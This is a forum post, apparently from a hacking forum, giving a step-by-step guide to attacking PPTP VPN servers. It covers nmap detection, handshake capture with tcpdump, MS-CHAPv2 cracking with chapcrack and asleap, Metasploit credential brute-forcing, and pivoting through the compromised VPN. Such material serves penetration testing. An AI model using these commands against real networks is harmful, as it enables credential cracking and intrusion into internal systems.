• [ Регистрация ]Открытая и бесплатная
  • Tg admin@ALPHV_Admin (обязательно подтверждение в ЛС форума)

Статья PPTP - Port 1723

stihl

stihl

Moderator
Регистрация
09.02.2012
Сообщения
1,178
Розыгрыши
0
Реакции
510
Deposit
0.228 BTC
stihl не предоставил(а) никакой дополнительной информации.

Basic info​

The Point-to-Point Tunneling Protocol (PPTP) is a network protocol used to implement virtual private networks (VPNs). While PPTP has been widely adopted due to its ease of configuration and speed, it is notoriously vulnerable. Understanding how to identify, test, and exploit these vulnerabilities is essential for penetration testers.

This guide covers in-depth technical methods to identify, analyze, and exploit PPTP, allowing security professionals to perform accurate vulnerability assessments and simulate real-world attack vectors.

Understanding the PPTP Protocol Structure​

PPTP uses the following components:


  • TCP Port 1723: For control messages

  • GRE (Generic Routing Encapsulation): Protocol number 47, used to encapsulate PPP frames
Misconfigured or poorly filtered GRE traffic can lead to exploitable situations where the attacker intercepts or manipulates the VPN communication.

Authentication Mechanisms and Weaknesses​

PPTP uses Microsoft’s Point-to-Point Encryption (MPPE) combined with MS-CHAPv1 or MS-CHAPv2. Both have critical weaknesses.

MS-CHAPv2 Authentication Vulnerabilities​


  • Susceptible to dictionary attacks

  • Challenge-response mechanisms can be captured and cracked

  • NT Hash is derived from the user password, allowing offline brute-force

Identifying PPTP Services During Network Reconnaissance​

Nmap Scanning for PPTP Detection​

To identify active PPTP services, use the Nmap port scanner targeting TCP port 1723:


Код: 
nmap -sS -p 1723 --script pptp-version <target-ip>

Look for:


  • Open port 1723 (PPTP control channel)

  • OS fingerprinting to detect routers or VPN appliances

Banner Grabbing​

Use Netcat to manually interact with the PPTP port:


Код: 
ync <target-ip> 1723

A PPTP server typically responds with GRE negotiation identifiers.

Capturing and Cracking MS-CHAPv2 Handshakes​

Tools for PPTP Handshake Capture​

Use a Man-in-the-Middle approach or capture with Wireshark on port 1723 and GRE:


Код: 
tcpdump -i eth0 port 1723 or proto gre -w pptp_handshake.pcap

Cracking with chapcrack and asleap​


  1. Extract challenge and response:

    Код: 
    chapcrack -i pptp_handshake.pcap -o challenge_response.txt

  2. Crack using asleap:

    Код: 
    asleap -C <challenge> -R <response> -W /path/to/wordlist
This enables offline cracking of MS-CHAPv2 handshakes using known dictionaries.

Exploiting PPTP Using Metasploit​

Metasploit includes auxiliary modules for PPTP brute-force:

Код: 
bashCopyEdituse auxiliary/scanner/vpn/pptp_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run

You can combine this with previously cracked NTLM hashes to validate credentials.

VPN Pivoting After PPTP Access​

After compromising PPTP, attackers can establish a VPN session and pivot into internal networks.

Use tools like pptpsetup or pppd to establish the session:

Код: 
pptpsetup --create pptpvpn --server <target-ip> --username user --password pass --encrypt
pon pptpvpn

Confirm GRE tunneling is established and route internal traffic through the VPN interface.


Для просмотра ссылки Войди или Зарегистрируйся
 
Войдите или зарегистрируйтесь для ответа.
Activity
So far there's no one here
Сверху Снизу